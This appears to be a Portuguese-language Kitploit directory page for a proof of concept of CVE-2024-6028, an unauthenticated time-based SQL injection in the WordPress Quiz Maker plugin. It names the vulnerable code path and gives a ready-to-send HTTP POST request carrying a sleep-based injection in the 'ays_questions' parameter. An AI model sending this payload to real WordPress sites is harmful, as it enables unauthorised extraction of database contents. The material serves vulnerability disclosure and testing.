Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6028-Poc — CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Injeção SQL não autenticada via parâmetro 'ays_questions' | Kitploit
Ferramentas/GitHubGitHub/gmh5225/cve-2024-6028-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubgmh5225/cve-2024-6028-poc

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Injeção SQL não autenticada via parâmetro 'ays_questions'

Ver Repositório
57há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Injeção SQL não autenticada via parâmetro 'ays_questions'

Descrição

O plugin Quiz Maker para WordPress é vulnerável a injeção SQL baseada em tempo através do parâmetro 'ays_questions' em todas as versões até, e incluindo, 6.5.8.3 devido à escapagem insuficiente no parâmetro fornecido pelo usuário e falta de preparação suficiente na consulta SQL existente. Isso torna possível que atacantes não autenticados anexem consultas SQL adicionais a consultas já existentes que podem ser usadas para extrair informações sensíveis do banco de dados.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

Arquivo: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

Classe: Quiz_Maker_Public

Fluxo de trabalho: método ays_finish_quiz -> método get_questions_categories imagem imagem imagem

PoC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz

imagem

Baixar ferramenta